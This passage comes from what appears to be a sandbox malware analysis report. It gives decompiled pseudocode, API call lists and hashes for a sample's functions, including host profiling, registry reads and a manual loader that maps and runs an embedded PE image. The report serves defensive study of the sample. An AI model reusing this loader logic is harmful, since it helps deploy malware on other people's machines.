          					_t59 = _v12;
          					if(_t59 != 0) {
          						goto L12;
          					}
          					asm("bt [esi+0x24], eax");
          					if(_t59 >= 0) {
          						asm("bt [esi+0x24], eax");
          						if(__eflags >= 0) {
          							L8:
          							_t53 = _t56 - 0x43175abf;
          							L9:
          							_t42 = VirtualProtect( *((intOrPtr*)(_t57 + 0xc)) + _a4,  *(_t57 + 8), _t53,  &_v20); // executed
          							if(_t42 == 0) {
          								_v12 = GetLastError();
          							}
          							_t57 = _t57 + (_t56 - 0x3175ac2) * 0x28;
          							_v8 = _v8 + 1;
          							if(_v8 < _v16) {
          								continue;
          							} else {
          								goto L12;
          							}
          						}
          						asm("bt [esi+0x24], eax");
          						_t53 = _t56 - 0x43175ac1;
          						if(__eflags >= 0) {
          							goto L9;
          						}
          						goto L8;
          					}
          					asm("bt [esi+0x24], eax");
          					if(_t59 >= 0) {
          						_t53 = _t56 - 0x43175aa3;
          					} else {
          						_t53 = _t56 - 0x43175a83;
          					}
          					goto L9;
          				}
          				goto L12;
          			}

          APIs
          • VirtualProtect.KERNELBASE(00000000,?,?,?,?,?,00000000,?,?), ref: 00401508
          • VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 0040157D
          • GetLastError.KERNEL32 ref: 00401583
          Memory Dump Source
          • Source File: 00000000.00000002.580483251.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.580483251.0000000000403000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.580483251.0000000000405000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.580483251.0000000000407000.00000040.00000001.01000000.00000003.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_server_(3).jbxd
          Similarity
          • API ID: ProtectVirtual$ErrorLast
          • String ID:
          • API String ID: 1469625949-0
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 47%
          			E005E12C6(char* _a4, char** _a8) {
          				char* _t7;
          				char* _t11;
          				char* _t14;
          				char* _t16;
          				char* _t17;
          				char _t18;
          				signed int _t20;
          				signed int _t22;
          
          				_t16 = _a4;
          				_push(0x20);
          				_t20 = 1;
          				_push(_t16);
          				while(1) {
          					_t7 = StrChrA();
          					if(_t7 == 0) {
          						break;
          					}
          					_t20 = _t20 + 1;
          					_push(0x20);
          					_push( &(_t7[1]));
          				}
          				_t11 = E005E33DC(_t20 << 2);
          				_a4 = _t11;
          				if(_t11 != 0) {
          					StrTrimA(_t16, 0x5e9278); // executed
          					_t22 = 0;
          					do {
          						_t14 = StrChrA(_t16, 0x20);
          						if(_t14 != 0) {
          							 *_t14 = 0;
          							do {
          								_t14 =  &(_t14[1]);
          								_t18 =  *_t14;
          							} while (_t18 == 0x20 || _t18 == 9);
          						}
          						_t17 = _a4;
          						 *(_t17 + _t22 * 4) = _t16;
          						_t22 = _t22 + 1;
          						_t16 = _t14;
          					} while (_t14 != 0);
          					 *_a8 = _t17;
          				}
          				return 0;
          			}

          APIs
          • StrChrA.SHLWAPI(?,00000020,00000000,02BC95FC,?,?,005E53AF,?,02BC95FC), ref: 005E12E2
          • StrTrimA.KERNELBASE(?,005E9278,00000002,?,005E53AF,?,02BC95FC), ref: 005E1300
          • StrChrA.SHLWAPI(?,00000020,?,005E53AF,?,02BC95FC), ref: 005E130B
          Memory Dump Source
          • Source File: 00000000.00000002.580662493.00000000005E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 005E0000, based on PE: true
          • Associated: 00000000.00000002.580658299.00000000005E0000.00000004.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580668636.00000000005E9000.00000002.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580672954.00000000005EA000.00000004.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580678713.00000000005EC000.00000002.10000000.00040000.00000000.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_5e0000_server_(3).jbxd
          Similarity
          • API ID: Trim
          • String ID:
          • API String ID: 3043112668-0
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 100%
          			E005E61DA(void* _a4) {
          				char _t2;
          
          				_t2 = RtlFreeHeap( *0x5ea2d8, 0, _a4); // executed
          				return _t2;
          			}

          APIs
          • RtlFreeHeap.NTDLL(00000000,00000000,005E6383,00000000,?,00000000,00000000), ref: 005E61E6
          Memory Dump Source
          • Source File: 00000000.00000002.580662493.00000000005E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 005E0000, based on PE: true
          • Associated: 00000000.00000002.580658299.00000000005E0000.00000004.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580668636.00000000005E9000.00000002.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580672954.00000000005EA000.00000004.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580678713.00000000005EC000.00000002.10000000.00040000.00000000.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_5e0000_server_(3).jbxd
          Similarity
          • API ID: FreeHeap
          • String ID: Uqt
          • API String ID: 3298025750-2320327147
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 75%
          			E005E790B(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
          				void* _v8;
          				void* __esi;
          				intOrPtr* _t35;
          				void* _t40;
          				intOrPtr* _t41;
          				intOrPtr* _t43;
          				intOrPtr* _t45;
          				intOrPtr* _t50;
          				intOrPtr* _t52;
          				void* _t54;
          				intOrPtr* _t55;
          				intOrPtr* _t57;
          				intOrPtr* _t61;
          				intOrPtr* _t65;
          				intOrPtr _t68;
          				void* _t72;
          				void* _t75;
          				void* _t76;
          
          				_t55 = _a4;
          				_t35 =  *((intOrPtr*)(_t55 + 4));
          				_a4 = 0;
          				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
          				if(_t76 < 0) {
          					L18:
          					return _t76;
          				}
          				_t40 = E005E4358(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
          				_t76 = _t40;
          				if(_t76 >= 0) {
          					_t61 = _a28;
          					if(_t61 != 0 &&  *_t61 != 0) {
          						_t52 = _v8;
          						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
          					}
          					if(_t76 >= 0) {
          						_t43 =  *_t55;
          						_t68 =  *0x5ea348; // 0x25dd5a8
          						_t20 = _t68 + 0x5eb270; // 0x740053
          						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
          						if(_t76 >= 0) {
          							_t76 = E005E4984(_a4);
          							if(_t76 >= 0) {
          								_t65 = _a28;
          								if(_t65 != 0 &&  *_t65 == 0) {
          									_t50 = _a4;
          									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
          								}
          							}
          						}
          						_t45 = _a4;
          						if(_t45 != 0) {
          							 *((intOrPtr*)( *_t45 + 8))(_t45);
          						}
          						_t57 = __imp__#6;
          						if(_a20 != 0) {
          							 *_t57(_a20);
          						}
          						if(_a12 != 0) {
          							 *_t57(_a12);
          						}
          					}
          				}
          				_t41 = _v8;
          				 *((intOrPtr*)( *_t41 + 8))(_t41);
          				goto L18;
          			}

          APIs
            • Part of subcall function 005E4358: SysAllocString.OLEAUT32(80000002), ref: 005E43B5
            • Part of subcall function 005E4358: SysFreeString.OLEAUT32(00000000), ref: 005E441B
          • SysFreeString.OLEAUT32(?), ref: 005E79EA
          • SysFreeString.OLEAUT32(005E4D42), ref: 005E79F4
          Memory Dump Source
          • Source File: 00000000.00000002.580662493.00000000005E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 005E0000, based on PE: true
          • Associated: 00000000.00000002.580658299.00000000005E0000.00000004.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580668636.00000000005E9000.00000002.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580672954.00000000005EA000.00000004.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580678713.00000000005EC000.00000002.10000000.00040000.00000000.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_5e0000_server_(3).jbxd
          Similarity
          • API ID: String$Free$Alloc
          • String ID:
          • API String ID: 986138563-0
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 100%
          			E0040139F() {
          				char _v16;
          				intOrPtr _v28;
          				void _v32;
          				void* _v36;
          				intOrPtr _t15;
          				void* _t16;
          				void* _t24;
          				long _t25;
          				int _t26;
          				void* _t30;
          				intOrPtr* _t32;
          				signed int _t35;
          				intOrPtr _t38;
          
          				_t15 =  *0x404184;
          				if( *0x40416c > 5) {
          					_t16 = _t15 + 0x40513c;
          				} else {
          					_t16 = _t15 + 0x40529c;
          				}
          				E00401D3C(_t16, _t16);
          				_t35 = 6;
          				memset( &_v32, 0, _t35 << 2);
          				_t24 = E00401882( &_v32,  &_v16,  *0x404180 ^ 0xdd0210cf); // executed
          				if(_t24 == 0) {
          					_t25 = 0xb;
          				} else {
          					_t26 = lstrlenW( *0x404178);
          					_t8 = _t26 + 2; // 0x2
          					_t11 = _t26 + _t8 + 8; // 0xa
          					_t30 = E004015B0(_t38, _t11,  &_v32,  &_v36); // executed
          					if(_t30 == 0) {
          						_t32 = _v36;
          						 *_t32 = 0;
          						if( *0x404178 == 0) {
          							 *((short*)(_t32 + 4)) = 0;
          						} else {
          							L00401FE6(_t32 + 4);
          						}
          					}
          					_t25 = E004012FB(_v28); // executed
          				}
          				ExitThread(_t25);
          			}

          Memory Dump Source
          • Source File: 00000000.00000002.580483251.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.580483251.0000000000403000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.580483251.0000000000405000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.580483251.0000000000407000.00000040.00000001.01000000.00000003.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_server_(3).jbxd
          Similarity
          • API ID: ExitThreadlstrlen
          • String ID:
          • API String ID: 2636182767-0
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 100%
          			E005E33F1(intOrPtr* __edi, void* _a4, intOrPtr _a8, unsigned int _a12) {
          				void* _t21;
          				void* _t22;
          				signed int _t24;
          				intOrPtr* _t26;
          				void* _t27;
          
          				_t26 = __edi;
          				if(_a4 == 0) {
          					L2:
          					_t27 = E005E58BD(_a4, 0x80000002, _a8, _a12,  &_a4,  &_a12);
          					if(_t27 == 0) {
          						_t24 = _a12 >> 1;
          						if(_t24 == 0) {
          							_t27 = 2;
          							HeapFree( *0x5ea2d8, 0, _a4);
          						} else {
          							_t21 = _a4;
          							 *((short*)(_t21 + _t24 * 2 - 2)) = 0;
          							 *_t26 = _t21;
          						}
          					}
          					L6:
          					return _t27;
          				}
          				_t22 = E005E2839(_a4, _a8, _a12, __edi); // executed
          				_t27 = _t22;
          				if(_t27 == 0) {
          					goto L6;
          				}
          				goto L2;
          			}

          APIs
            • Part of subcall function 005E2839: SysFreeString.OLEAUT32(00000000), ref: 005E289C
          • HeapFree.KERNEL32(00000000,00000000,00000000,80000002,7476F710,?,00000000,?,00000000,?,005E528E,?,004F0053,02BC9218,00000000,?), ref: 005E3454
          Memory Dump Source
          • Source File: 00000000.00000002.580662493.00000000005E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 005E0000, based on PE: true
          • Associated: 00000000.00000002.580658299.00000000005E0000.00000004.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580668636.00000000005E9000.00000002.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580672954.00000000005EA000.00000004.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580678713.00000000005EC000.00000002.10000000.00040000.00000000.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_5e0000_server_(3).jbxd
          Similarity
          • API ID: Free$HeapString
          • String ID: Uqt
          • API String ID: 3806048269-2320327147
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 37%
          			E005E472F(void* __ecx) {
          				signed int _v8;
          				void* _t15;
          				void* _t19;
          				void* _t20;
          				void* _t22;
          				intOrPtr* _t23;
          
          				_t23 = __imp__;
          				_t20 = 0;
          				_v8 = _v8 & 0;
          				 *_t23(3, 0,  &_v8, _t19, _t22, __ecx); // executed
          				_t10 = _v8;
          				if(_v8 != 0) {
          					_t20 = E005E33DC(_t10 + 1);
          					if(_t20 != 0) {
          						_t15 =  *_t23(3, _t20,  &_v8); // executed
          						if(_t15 != 0) {
          							 *((char*)(_v8 + _t20)) = 0;
          						} else {
          							E005E61DA(_t20);
          							_t20 = 0;
          						}
          					}
          				}
          				return _t20;
          			}

          APIs
          • GetComputerNameExA.KERNELBASE(00000003,00000000,005E3DCD,00000000,00000000,?,775EC740,005E3DCD), ref: 005E4747
            • Part of subcall function 005E33DC: RtlAllocateHeap.NTDLL(00000000,00000000,005E62F6), ref: 005E33E8
          • GetComputerNameExA.KERNELBASE(00000003,00000000,005E3DCD,005E3DCE,?,775EC740,005E3DCD), ref: 005E4764
            • Part of subcall function 005E61DA: RtlFreeHeap.NTDLL(00000000,00000000,005E6383,00000000,?,00000000,00000000), ref: 005E61E6
          Memory Dump Source
          • Source File: 00000000.00000002.580662493.00000000005E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 005E0000, based on PE: true
          • Associated: 00000000.00000002.580658299.00000000005E0000.00000004.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580668636.00000000005E9000.00000002.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580672954.00000000005EA000.00000004.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580678713.00000000005EC000.00000002.10000000.00040000.00000000.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_5e0000_server_(3).jbxd
          Similarity
          • API ID: ComputerHeapName$AllocateFree
          • String ID:
          • API String ID: 187446995-0
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 100%
          			// Runtime initialisation. The private heap created here (handle kept at 0x5ea2d8)
          			// is the one the HeapFree(*0x5ea2d8, ...) calls elsewhere in this dump release
          			// into; the tick count stored at 0x5ea1c8 is a start timestamp. Returns 8
          			// (ERROR_NOT_ENOUGH_MEMORY) when HeapCreate fails, otherwise the status of the
          			// initialisation chain. The /* */ prefix on each statement is its instruction address.
          			E005E5006(signed int __edx, intOrPtr _a4) {
          				void* _t3;
          				void* _t5;
          				void* _t7;
          				void* _t8;
          				void* _t9;
          				signed int _t10;
          
          /* 005e5006 */	_t10 = __edx;
          /* 005e500f */	_t3 = HeapCreate(0, 0x400000, 0); // executed; growable private heap, 4 MiB initial size
          /* 005e5015 */	 *0x5ea2d8 = _t3;
          /* 005e501c */	if(_t3 == 0) {
          /* 005e5020 */		_t8 = 8; // ERROR_NOT_ENOUGH_MEMORY
          /* -------- */		return _t8;
          /* 005e5020 */	}
          /* 005e502d */	 *0x5ea1c8 = GetTickCount();
          /* 005e5032 */	_t5 = E005E54D8(_a4);
          /* 005e5039 */	if(_t5 == 0) {
          /* 005e503f */		_t5 = E005E213E(_t9, _a4); // executed
          /* 005e5046 */		if(_t5 == 0) {
          /* 005e504f */			if(E005E6392(_t9) != 0) {
          /* 005e5051 */				 *0x5ea300 = 1; // executed
          /* 005e5051 */			}
          /* 005e505b */			_t7 = E005E2523(_t10); // executed
          /* -------- */			return _t7;
          /* 005e505b */		}
          /* 005e5046 */	}
          /* 005e5060 */	return _t5;
          			}

          APIs
          • HeapCreate.KERNELBASE(00000000,00400000,00000000,005E107E,?), ref: 005E500F
          • GetTickCount.KERNEL32 ref: 005E5023
          Memory Dump Source
          • Source File: 00000000.00000002.580662493.00000000005E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 005E0000, based on PE: true
          • Associated: 00000000.00000002.580658299.00000000005E0000.00000004.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580668636.00000000005E9000.00000002.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580672954.00000000005EA000.00000004.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580678713.00000000005EC000.00000002.10000000.00040000.00000000.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_5e0000_server_(3).jbxd
          Similarity
          • API ID: CountCreateHeapTick
          • String ID:
          • API String ID: 2177101570-0
          • Opcode ID: a6a87ba267cd212c3f8bf499eaec98a309bc0131a0a152722327569f78f95d37
          • Instruction ID: a43707b6fb4944e01d441dffe3bf5eb1e2ba049d354c31760f49a1ca8f769cd1
          • Opcode Fuzzy Hash: a6a87ba267cd212c3f8bf499eaec98a309bc0131a0a152722327569f78f95d37
          • Instruction Fuzzy Hash: 4DF02B30540BC2DADB6D2B339C9D7053F947FA4748F504415F9C1D8092FB70E808EA21
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • SetErrorMode.KERNELBASE(00000400,?,?,005C0223,?,?), ref: 005C0E19
          • SetErrorMode.KERNELBASE(00000000,?,?,005C0223,?,?), ref: 005C0E1E
          Memory Dump Source
          • Source File: 00000000.00000002.580647391.00000000005C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005C0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_5c0000_server_(3).jbxd
          Yara matches
          Similarity
          • API ID: ErrorMode
          • String ID:
          • API String ID: 2340568224-0
          • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
          • Instruction ID: 62d43324511f6a0460b43ce37119c2a39e606a598f81983a70edaf776378af12
          • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
          • Instruction Fuzzy Hash: 17D01231145128B7D7003AD4DC09BCD7F1CDF05B62F008411FB0DD9080C770994046E5
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 34%
          			// Reads a string value from under HKEY_LOCAL_MACHINE (0x80000002) through
          			// E005E790B, whose out-parameter is a 16-byte VARIANT (zeroed by the
          			// stosd/stosd/stosd/stosw sequence: vt at _v20, value at _v12). The vt == 8
          			// (VT_BSTR) check and the SysFreeString calls inside and after E005E790B fit the
          			// report's "reads registry keys via WMI" signature. The BSTR is copied to the
          			// module heap by E005E661C (lstrlenW/memcpy) and returned through _a16. Returns 0
          			// on success, 1 if the value is not a string, 8 if the copy fails, or the negative
          			// status from E005E790B.
          			E005E2839(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
          				intOrPtr _v12; // VARIANT.bstrVal
          				void* _v18;
          				char _v20; // VARIANT.vt
          				intOrPtr _t15;
          				void* _t17;
          				intOrPtr _t19;
          				void* _t23;
          
          /* 005e2843 */	_v20 = 0;
          /* 005e284a */	asm("stosd");
          /* 005e284b */	asm("stosd");
          /* 005e284c */	asm("stosd");
          /* 005e284d */	asm("stosw");
          /* 005e2853 */	_t15 =  *0x5ea348; // 0x25dd5a8, base adjustment applied to the module's string addresses
          /* 005e2858 */	_t4 = _t15 + 0x5eb3e8; // 0x2bc8990
          /* 005e2858 */	_t20 = _t4;
          /* 005e2862 */	_t6 = _t15 + 0x5eb174; // 0x650047, reads as UTF-16LE "Ge", the start of a method name
          /* 005e2874 */	_t17 = E005E790B(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed; 0x80000002 = HKEY_LOCAL_MACHINE
          /* 005e287b */	if(_t17 < 0) {
          /* 005e28a9 */		_t23 = _t17;
          /* 005e287d */	} else {
          /* 005e287f */		_t23 = 8;
          /* 005e2884 */		if(_v20 != _t23) { // vt != VT_BSTR
          /* 005e28a6 */			_t23 = 1;
          /* 005e2886 */		} else {
          /* 005e2889 */			_t19 = E005E661C(_t20, _v12);
          /* 005e2890 */			if(_t19 != 0) {
          /* 005e2895 */				 *_a16 = _t19;
          /* 005e2897 */				_t23 = 0;
          /* 005e2897 */			}
          /* 005e289c */			__imp__#6(_v12); // OLEAUT32 ordinal 6 = SysFreeString
          /* 005e289c */		}
          /* 005e2884 */	}
          /* 005e28b0 */	return _t23;
          			}

          APIs
            • Part of subcall function 005E790B: SysFreeString.OLEAUT32(?), ref: 005E79EA
            • Part of subcall function 005E661C: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,005E4B72,004F0053,00000000,?), ref: 005E6625
            • Part of subcall function 005E661C: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,005E4B72,004F0053,00000000,?), ref: 005E664F
            • Part of subcall function 005E661C: memset.NTDLL ref: 005E6663
          • SysFreeString.OLEAUT32(00000000), ref: 005E289C
          Memory Dump Source
          • Source File: 00000000.00000002.580662493.00000000005E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 005E0000, based on PE: true
          • Associated: 00000000.00000002.580658299.00000000005E0000.00000004.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580668636.00000000005E9000.00000002.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580672954.00000000005EA000.00000004.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580678713.00000000005EC000.00000002.10000000.00040000.00000000.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_5e0000_server_(3).jbxd
          Similarity
          • API ID: FreeString$lstrlenmemcpymemset
          • String ID:
          • API String ID: 397948122-0
          • Opcode ID: 49c1c08d60e7f12e544e0e2aecc5e8d523e1ac56c8d40376c114b941bef8434a
          • Instruction ID: a4fe3e465a4c762c71042005412b49781e968128990b0280597625994cb06f58
          • Opcode Fuzzy Hash: 49c1c08d60e7f12e544e0e2aecc5e8d523e1ac56c8d40376c114b941bef8434a
          • Instruction Fuzzy Hash: 40019E72904259BFDB499FA6CC449AABBB8FF58350F000425E981E7061E7719911C790
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 37%
          			// Builds a security descriptor from the SDDL string passed in _a4 (0x4013cc in the
          			// recorded call below) and leaves it in a SECURITY_ATTRIBUTES laid out at 0x404188:
          			// nLength = 0xc at 0x404188, lpSecurityDescriptor at 0x40418c (filled by the call),
          			// bInheritHandle = 0 at 0x404190. L00401682 is the import thunk for
          			// ConvertStringSecurityDescriptorToSecurityDescriptorA (ref 00401D5A in the API list).
          			E00401D3C(void* __eax, intOrPtr _a4) {
          
          /* 00401d3c */	 *0x404190 =  *0x404190 & 0x00000000; // bInheritHandle = FALSE
          /* 00401d43 */	_push(0); // SecurityDescriptorSize = NULL
          /* 00401d45 */	_push(0x40418c); // &lpSecurityDescriptor
          /* 00401d4a */	_push(1); // SDDL_REVISION_1
          /* 00401d4c */	_push(_a4); // SDDL string
          /* 00401d50 */	 *0x404188 = 0xc; // executed; nLength = sizeof(SECURITY_ATTRIBUTES)
          /* 00401d5a */	L00401682(); // executed
          /* 00401d5f */	return __eax;
          			}

          APIs
          • ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(004013CC,00000001,0040418C,00000000), ref: 00401D5A
          Memory Dump Source
          • Source File: 00000000.00000002.580483251.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.580483251.0000000000403000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.580483251.0000000000405000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.580483251.0000000000407000.00000040.00000001.01000000.00000003.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_server_(3).jbxd
          Similarity
          • API ID: DescriptorSecurity$ConvertString
          • String ID:
          • API String ID: 3907675253-0
          • Opcode ID: d44a2a0f54f5e6775fd6c1e8a7c4d446c5909fbbc7626a237563b1b511256517
          • Instruction ID: 8b1a9882f0f7b6f5a619b3d6300b2bdd32795284b236dc0e31706888a106ff8d
          • Opcode Fuzzy Hash: d44a2a0f54f5e6775fd6c1e8a7c4d446c5909fbbc7626a237563b1b511256517
          • Instruction Fuzzy Hash: AFC04CF4140300B7E620AB409D5AF057A5577A4715F61062DFB04391E1C3F91094952D
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 100%
          			// Allocation wrapper: RtlAllocateHeap on the heap whose handle is kept at 0x404160,
          			// with no flags (the block is not zeroed).
          			E004012E6(long _a4) {
          				void* _t2;
          
          /* 004012f2 */	_t2 = RtlAllocateHeap( *0x404160, 0, _a4); // executed
          /* 004012f8 */	return _t2;
          			}

          APIs
          • RtlAllocateHeap.NTDLL(00000000,?,00401A18,00000030,?,00000000), ref: 004012F2
          Memory Dump Source
          • Source File: 00000000.00000002.580483251.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.580483251.0000000000403000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.580483251.0000000000405000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.580483251.0000000000407000.00000040.00000001.01000000.00000003.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_server_(3).jbxd
          Similarity
          • API ID: AllocateHeap
          • String ID:
          • API String ID: 1279760036-0
          • Opcode ID: 8d53e43e4fecd4b65d19afa8ec6fbbeba3cde750ccf00ed1d63409ce6b8d1d85
          • Instruction ID: e72f98105ba7c706faca8ef9926cddb4ff6cd2f9e0c1ce1923eff6ceed1ee1be
          • Opcode Fuzzy Hash: 8d53e43e4fecd4b65d19afa8ec6fbbeba3cde750ccf00ed1d63409ce6b8d1d85
          • Instruction Fuzzy Hash: 92B012B1100100ABCA118F11EF08F06BE31B7E4701F004030B3042407482314C20FB1D
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 100%
          			// Free wrapper matching E004012E6: RtlFreeHeap on the heap at 0x404160.
          			E00401BA9(void* _a4) {
          				char _t2;
          
          /* 00401bb5 */	_t2 = RtlFreeHeap( *0x404160, 0, _a4); // executed
          /* 00401bbb */	return _t2;
          			}

          APIs
          • RtlFreeHeap.NTDLL(00000000,00000030,004017ED,00000000,00000030,00000000,00000000,00000030,?,?,?,?,?,00401A66), ref: 00401BB5
          Memory Dump Source
          • Source File: 00000000.00000002.580483251.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.580483251.0000000000403000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.580483251.0000000000405000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.580483251.0000000000407000.00000040.00000001.01000000.00000003.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_server_(3).jbxd
          Similarity
          • API ID: FreeHeap
          • String ID:
          • API String ID: 3298025750-0
          • Opcode ID: 3b8eee9051a441d58e5db666830f183a15b7cffca9eb150e625e3af0535b1606
          • Instruction ID: ce698fd0423bda5088509b7a42681047dd9c8e559710f82c1ef419a06116bbed
          • Opcode Fuzzy Hash: 3b8eee9051a441d58e5db666830f183a15b7cffca9eb150e625e3af0535b1606
          • Instruction Fuzzy Hash: 8AB01271000100BBCA118F10EF08F067F21B7E4701F008030B3046407482314D60FB0C
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 86%
          			// Manual PE mapper for the embedded image at __eax; this is the behaviour behind the
          			// report's "changes PE section rights" signature. Offsets: +0x3c is e_lfanew,
          			// NT+0x50 is OptionalHeader.SizeOfImage and NT+0x28 is AddressOfEntryPoint. The size
          			// is rounded as (size + k) & ~k (the decompiler prints ~ as !), with k derived from
          			// *0x404180 and 0x43174ac4, an obfuscated alignment mask whose value this page does
          			// not show. E00401202 resolves the needed APIs (GetModuleHandleA/GetProcAddress in
          			// the API list) into a small function table (_v12) and returns the destination
          			// buffer (_v8); E00401BC4 copies the image into it, E00401000 resolves imports
          			// (LoadLibraryA), E004014CF applies section protections (VirtualProtect), and the
          			// entry point is then called as DllMain(base, DLL_PROCESS_ATTACH, NULL).
          			E004012FB(void* __eax) {
          				char _v8; // mapped image base
          				void* _v12; // function table from E00401202
          				void* __edi;
          				void* _t18;
          				long _t24;
          				long _t26;
          				long _t29;
          				intOrPtr _t40;
          				void* _t41;
          				void* _t42;
          				void* _t44;
          
          /* 00401303 */	_t41 = __eax;
          /* 00401305 */	_t16 =  *0x404180;
          /* 00401321 */	_t33 =  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x404180 - 0x43174ac4 &  !( *0x404180 - 0x43174ac4); // SizeOfImage, rounded up
          /* 00401332 */	_t18 = E00401202( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x404180 - 0x43174ac4 &  !( *0x404180 - 0x43174ac4),  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x404180 - 0x43174ac4 &  !( *0x404180 - 0x43174ac4), _t16 + 0xbce8a57d,  &_v8,  &_v12); // executed
          /* 00401339 */	if(_t18 != 0) {
          /* 00401397 */		_t29 = 8;
          /* -------- */		goto L8;
          /* 0040133b */	} else {
          /* 0040133b */		_t40 = _v8;
          /* 00401345 */		_t29 = E00401BC4(_t33, _t40, _t41); // copy image _t41 into the new buffer _t40
          /* 00401349 */		if(_t29 == 0) {
